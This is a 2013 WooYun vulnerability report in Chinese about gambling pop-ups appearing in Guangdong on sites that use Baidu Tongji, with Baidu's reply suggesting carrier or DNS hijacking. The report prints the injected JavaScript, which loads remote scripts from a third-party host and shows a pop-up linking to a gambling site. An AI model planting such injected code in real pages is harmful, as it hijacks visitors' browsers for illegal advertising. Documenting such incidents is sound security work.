当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036659

漏洞标题:广东地区使用百度统计的网站弹出非法博彩信息

相关厂商:百度

漏洞作者: 猪刚鬣

提交时间:2013-09-10 14:29

修复时间:2013-10-25 14:30

公开时间:2013-10-25 14:30

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-10: 细节已通知厂商并且等待厂商处理中
2013-09-13: 厂商已经确认,细节仅向厂商公开
2013-09-23: 细节向核心白帽子及相关领域专家公开
2013-10-03: 细节向普通白帽子公开
2013-10-13: 细节向实习白帽子公开
2013-10-25: 细节向公众公开

简要描述:

使用百度相关产品,比如百度统计的网站,会弹出非法博彩信息,例如乌云

详细说明:

广东地区访问,使用百度相关产品的网站,都会弹出下面类似的非法博彩信息(比如乌云)

woyun.jpg


QQ图片20130910143148.jpg


var title='精彩推荐';
window.onload=function()
{
//判断城市
var caption;
var surl;
var content;
function Show()
{
caption='[原创] 真钱游戏,欢迎您的加入';
surl='http://www.30880.com';
content='总统娱乐城为大众提供高质量娱乐服务,是国内优秀的网上真钱游戏娱乐城,本网公平公正,在业内信誉第一,是国内网上游戏领导品牌.<br /> <font color="red">真钱游戏种类: <br />真人百家乐,龙虎斗,彩票游戏,六合彩,体育投注,老虎机,扑克游戏等等。。。</font><br /> 为您打造最好玩,最真实的游戏品牌。客服全天24小时为您服务! <br /><a href="http://www.30880.com">点击进入注册</a>';
title='江苏新闻';
var pop=new Pop(caption,surl,content);
}

Show();

}
document.write("<script charset=\"GBK\" src=\"http:\/\/files.cnblogs.com\/xiaoyaodao\/jquery.min.js\"><\/script>");
document.write("<script charset=\"GBK\" src=\"http:\/\/files.cnblogs.com\/xiaoyaodao\/pop.js\"><\/script>");
document.write("<style type=\"text/css\">*{margin:0; " +
"padding:0;}#pop{background:#fff;width:260px;border:1px solid #e0e0e0;" +
"font-size:12px;position: fixed;right:10px;bottom:10px;}#popHead{line-height:32px;" +
"background:#f6f0f3;border-bottom:1px solid #e0e0e0;position:relative;font-size:12px;" +
"padding:0 0 0 10px;}#popHead h2{font-size:14px;color:#666;line-height:32px;height:32px;}" +
"#popHead #popClose{position:absolute;right:10px;top:1px;}" +
"#popHead a#popClose:hover{color:#f00;cursor:pointer;}#popContent{padding:5px 10px;}" +
"#popTitle a{line-height:24px;font-size:14px;font-family:'微软雅黑';color:#333;font-weight:bold;text-decoration:none;}" +
"#popTitle a:hover{color:#f60;}#popIntro{text-indent:24px;line-height:160%;margin:5px 0;" +
"color:#666;}#popMore{text-align:right;border-top:1px dotted #ccc;line-height:24px;" +
"margin:8px 0 0 0;}#popMore a{color:#f60;}#popMore a:hover{color:#f00;}</style>");
document.write("<div id=\"pop\" style=\"display:none;\">" +
"<div id=\"popHead\">" +
"<a id=\"popClose\" title=\"关闭\">关闭</a><h2>" + title + "</h2>" +
"</div>" +
"<div id=\"popContent\">" +
"<dl>" +
"<dt id=\"popTitle\"><a href=\"http://yanue.info\" target=\"_blank\"></a></dt>" +
"<dd id=\"popIntro\"></dd>" +
"</dl> <p id=\"popMore\"><a href=\"http:\/\/www.30880.com\" target=\"_blank\">查看</a></p>" +
"</div>" +
"</div>");

漏洞证明:

百度的相关产品也出现同样的问题,,经过对源码的分析,并未发现什么问题,唯一的区别就是,使用百度统计的网站会弹出,没有使用百度统计的网站没有弹出

QQ截图20130910133844.jpg

QQ截图20130910133651.jpg


PS:广东地区弹出,其他地区,未测试

修复方案:

打电话给百度,百度声称:我们是无敌的(我很无语-.-!)

版权声明:转载请注明来源 猪刚鬣@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2013-09-13 17:04

厂商回复:

在调查过程中,经过多次沟通,楼主无法提供具体数据协助定位流量劫持事件原因(运营商劫持或其他原因导致DNS劫持),且广东百度同学访问时未复现此劫持现象,再次感谢对百度安全的关注。
--“百度,因你更安全”

最新状态:

暂无